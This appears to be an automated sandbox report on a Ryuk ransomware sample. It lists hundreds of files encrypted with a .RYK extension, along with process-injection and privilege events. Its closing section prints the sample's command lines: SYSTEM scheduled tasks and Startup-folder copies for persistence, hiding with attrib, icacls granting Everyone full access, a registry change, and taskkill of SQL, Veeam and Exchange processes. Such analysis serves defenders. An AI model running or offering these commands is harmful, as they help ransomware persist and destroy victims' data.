File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\ui-strings.js.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-140.png.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOPRIV.DLL.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_OEM_Perp-pl.xrm-ms.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\STSLISTI.DLL.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\en-US\MSFT_PackageManagement.strings.psd1.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N1.svg.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\ui-strings.js.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Bold.otf.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\da.txt.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_CopyDrop32x32.gif.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest2-ppd.xrm-ms.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview.svg.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare.HxS.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_opencarat_18.svg.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\THMBNAIL.PNG.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\es-419.pak.DATA.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLL.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ppd.xrm-ms.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\APPLAUSE.WAV.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\delete.svg.[[email protected]].[BB7D8F73].RYK C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 636 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 4364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5076 wrote to memory of 4364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 636 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2052 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2052 wrote to memory of 560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 636 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 3812 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3812 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 636 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 4348 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4348 wrote to memory of 2472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 636 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 3780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2040 wrote to memory of 3780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 636 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1584 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 636 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 4852 wrote to memory of 2268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4852 wrote to memory of 2268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 636 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 4816 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4816 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 3720 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3720 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3720 wrote to memory of 3828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3720 wrote to memory of 3828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3344 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3344 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4392 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4392 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1380 wrote to memory of 3336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1380 wrote to memory of 3336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 636 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 636 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe C:\Windows\system32\cmd.exe
PID 4440 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4440 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\icacls.exe

